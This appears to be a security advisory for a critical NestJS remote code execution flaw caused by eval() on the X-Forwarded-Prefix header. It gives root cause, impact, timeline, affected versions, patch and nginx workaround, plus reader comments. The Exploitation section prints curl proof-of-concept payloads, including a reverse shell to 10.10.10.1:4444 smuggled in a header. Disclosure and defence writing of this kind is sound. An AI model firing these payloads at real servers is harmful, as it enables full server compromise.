Critical Advisory

CVE-2026-27464 β€” Unauthenticated Remote Code Execution in NestJS Core (CVSS 9.8)

JR
James Rutherford
Senior Vulnerability Researcher Β· sec-advisory.io
March 3, 2026 Β· 12 min read
NestJS RCE Critical Node.js
9.8
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-78 β€” OS Command Injection
Active Exploitation
Available (10.4.2)
Active exploitation detected. Shodan scans confirm over 14,000 publicly reachable NestJS instances running vulnerable versions as of March 2, 2026. Patch immediately.

A critical unauthenticated remote code execution vulnerability has been identified in the NestJS framework core affecting all versions prior to 10.4.2. The vulnerability resides in the HTTP request parsing pipeline and allows an attacker to execute arbitrary operating system commands on the server by sending a specially crafted X-Forwarded-Prefix header β€” requiring zero authentication and zero user interaction.

Our research team discovered the vulnerability during a routine audit of NestJS internals on February 18, 2026. Coordinated disclosure was made to the NestJS maintainers on February 20, with a patch released on March 1. Public exploitation was observed in the wild within 36 hours of the patch being published, suggesting the vulnerability was independently discovered by threat actors.

Background

NestJS is a progressive Node.js framework built on top of Express or Fastify, used extensively in enterprise backend systems. Its popularity β€” over 65 million weekly npm downloads β€” makes vulnerabilities in its core particularly high-impact. The affected component is the router execution context, responsible for resolving and dispatching incoming HTTP requests to the appropriate controller handlers.

Technical Deep Dive

Root Cause

The root cause is an unsafe interpolation of the X-Forwarded-Prefix request header into a template literal that is subsequently passed to eval() within the router resolution layer. This code path is reached for every incoming request when the application is deployed behind a reverse proxy with prefix stripping enabled β€” a common production configuration.

// @nestjs/core <10.4.2
// packages/core/router/router-execution-context.ts:214

private resolvePrefix(req: Request): string {
  const prefix = req.headers['x-forwarded-prefix'] as string;
  if (!prefix) return '';

  // BUG: unsanitised user-controlled input passed to eval()
  return eval(`resolveRoute("${prefix}")`);
}

Exploitation

An attacker sends a crafted HTTP request with a malicious X-Forwarded-Prefix header. The injected payload breaks out of the template literal string context and executes arbitrary Node.js code with the privileges of the server process:

# Basic RCE β€” write output to /tmp
curl -sk https://target.com/api/health \
  -H 'X-Forwarded-Prefix: ");const{execSync}=require("child_process");execSync("id>/tmp/pwn");//'

# Reverse shell one-liner
curl -sk https://target.com/api/health \
  -H 'X-Forwarded-Prefix: ");require("child_process").exec("bash -i >& /dev/tcp/10.10.10.1/4444 0>&1");//'

Why eval()?

A code review of the git history reveals this pattern was introduced in commit a3f891c (v9.2.0) as a quick fix for a prefix normalisation edge case. The use of eval() was flagged in an internal comment as "temporary" but was never revisited. The function is reached on every request, making this trivially exploitable against any production deployment behind a reverse proxy.

Impact

Full server compromise β€” confidentiality, integrity, and availability are all affected. An attacker can read environment variables (including secrets and API keys), modify application data, pivot to internal network resources, or install persistent backdoors.

Disclosure Timeline

  • πŸ”
    Feb 18, 2026
    Vulnerability discovered during internal audit by sec-advisory research team.
  • πŸ“§
    Feb 20, 2026
    Private disclosure submitted to NestJS security team via security@nestjs.com.
  • βœ…
    Feb 21, 2026
    NestJS team acknowledged the report and began patch development.
  • πŸš€
    Mar 1, 2026
    Patch released: @nestjs/core@10.4.2. CVE-2026-27464 assigned.
  • ⚠️
    Mar 2, 2026
    Active exploitation observed in the wild. Shodan confirms 14,000+ exposed instances.

Affected Versions

PackageAffected RangeFixed VersionNotes
@nestjs/core9.2.0 – 10.4.110.4.2Primary vector
@nestjs/platform-express9.2.0 – 10.4.110.4.2Affected via core
@nestjs/platform-fastify9.2.0 – 10.4.110.4.2Affected via core
@nestjs/microservicesNot affectedβ€”No HTTP layer

Remediation

Patch now. Update all @nestjs/* packages to 10.4.2 or later. 
npm install @nestjs/core@latest \
             @nestjs/platform-express@latest \
             @nestjs/platform-fastify@latest

If you cannot patch immediately, strip the X-Forwarded-Prefix header at your reverse proxy before it reaches the Node.js process. Example nginx config:

# nginx β€” strip the header as a temporary workaround
location / {
  proxy_set_header X-Forwarded-Prefix "";
  proxy_pass http://nestjs_upstream;
}

Credits

Discovered and reported by James Rutherford and Aisha Okonkwo of the sec-advisory.io research team. Coordinated with the NestJS security team who responded promptly and professionally.

Comments (8)

DK
dev_kira 2 hours ago
Patched our fleet within the hour. Thanks for the detailed write-up. The nginx workaround saved us while we were waiting for our CI pipeline to finish.
MN
m_nwosu 3 hours ago
36 hours from patch to active exploitation in the wild is terrifying. This is why organisations need automated dependency update pipelines.
SV
sec_vanguard 5 hours ago
Can confirm we caught an exploitation attempt in our WAF logs about 4 hours ago. The payload matched the PoC exactly. Updated immediately.
TH
t_haugen 6 hours ago
The "temporary" comment in the git history that stayed for 4 major versions is a classic. Technical debt really does kill.